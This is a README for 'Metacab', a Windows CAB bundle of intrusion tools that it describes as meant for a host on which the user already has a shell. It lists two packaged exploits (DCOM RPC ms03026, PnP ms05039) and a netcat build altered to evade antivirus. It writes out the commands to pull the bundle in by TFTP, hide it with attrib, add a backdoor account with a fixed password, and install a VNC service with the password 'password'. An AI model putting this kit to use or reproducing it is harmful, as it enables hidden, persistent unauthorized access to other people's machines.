--------------------------------- --------------------------------- --- --- --- README for /\/\etacab --- --- --- --------------------------------- --------------------------------- What is Metacab? ---------------- Metacab (meta.cab) is a single, inclusive Microsft CAB file of remote administration tools. The CAB file and everything within can be decompressed, installed and used with only cmd.exe. What's in the zip file? ----------------------- - ddf - Directive files for included CABs - meta.cab - Metacab - README.txt - This file What's included in meta.cab? ---------------------------- As of 2006-05-R7: - install.bat - Installs Metacab - install.cab - Which includes... - map.bat - Simple bat file to ping sweep a Class D - ms03026.exe - DCOM RPC overflow exploit - ms05039.exe - HOD's PnP exploit - nc.exe - Netcat - nmap.cab - Nmap CAB - ssh.cab - copSSH CAB - tcpdump.exe - Passive sniffer - uninstall.bat - Deletes Metacab installation - vnc.cab - VNC CAB - winpcap.exe - WinPcap needed for Nmap How do I get Metacab on to a remote host? ----------------------------------------- Assuming you have a shell on said host, you can FTP or TFTP Metacab over. Make sure to use binary mode! For example, using TFTP: C:\WINDOWS\system32>tftp -i 123.45.67.89 get meta.cab c:\windows\temp\meta.cab How do I install Metacab? ------------------------- C:\WINDOWS\system32>cd ..\temp C:\WINDOWS\Temp>expand meta.cab -f:* c:\windows\temp C:\WINDOWS\Temp>install Where did it go? ---------------- The install script uses attrib +h on the install directory, meta.cab and uninstall.bat. They're there. How do I uninstall Metacab? --------------------------- Given respective files aren't in use... C:\WINDOWS\Temp>uninstall How do I use copSSH? -------------------- C:\WINDOWS\Temp>net user sshuser p4ssw0rD /add C:\WINDOWS\Temp>cd install\ssh C:\WINDOWS\Temp\install\ssh>copssh /S C:\WINDOWS\Temp\install\ssh>installssh C:\WINDOWS\Temp\install\ssh>cd c:\progra~1\copssh\bin C:\Program Files\copssh\ssh>bash --login -c activate-user.sh Note that activate-user.sh doesn't return if you're using a remote cmd.exe. So make sure that's the last thing you want to do. How do I map a network? ----------------------- C:\WINDOWS\temp\install>map 123.45.67 > net.txt How do I use Netcat? -------------------- Google. How do I use Nmap? ------------------ Install WinPcap and registry edits... C:\WINDOWS\Temp\install>winpcap C:\WINDOWS\Temp\install>cd nmap C:\WINDOWS\Temp\install\nmap>regedit /s nmap_performance.reg then refer to http://www.insecure.org. How do I use tcpdump? --------------------- http://www.tcpdump.org/tcpdump_man.html How do I install VNC? --------------------- C:\WINDOWS\Temp\install\vnc>regedit /s vncdmp.reg C:\WINDOWS\Temp\install\vnc>winvnc -install C:\WINDOWS\Temp\install\vnc>net start winvnc What's the VNC password? ------------------------ password How do I remove VNC? -------------------- C:\WINDOWS\Temp\install\vnc>net stop winvnc C:\WINDOWS\Temp\install\vnc>winvnc -remove How do I tunnel VNC through SSH? -------------------------------- C:\WINDOWS\Temp\install\ssh>regedit /s vncssh.reg $ ssh sshuser@HOST -L 5900:127.0.0.1:5900 Then connect to localhost:5900. What about antivirus? --------------------- As of this release, Netcat eludes antivirus detection. ms05039 sometimes eludes antivirus. ms03026 is detected by antivirus. I don't trust you... -------------------- We don't blame you. You can always dowload the sources yourself and use the DDFs to make your own CABs. Where can I get the sources? ---------------------------- copSSH - http://www.itefix.no/copssh/ Exploits and Netcat - http://www.packetstormsecurity.org/ Nmap - http://download.insecure.org/nmap/dist/ TCPDUMP - http://www.microolap.com/products/network/tcpdump/ VNC - http://www.realvnc.com/dist/vnc-3.3.7-x86_win32.zip WinPcap - http://www.winpcap.org/archive/ How do I make a CAB? -------------------- makecab /f cab.ddf Who's responsible for this?! ---------------------------- Phoenix 2600: dre - For suggestions dual - For originally putting it together Evil1 - For suggestions Nak - For making Netcat invisible to anitvirus PHLAK - For testing XlogicX - For hosting the project page Zapperlink - For testing and suggestions Thanks to Packet Storm for hosting the stable versions.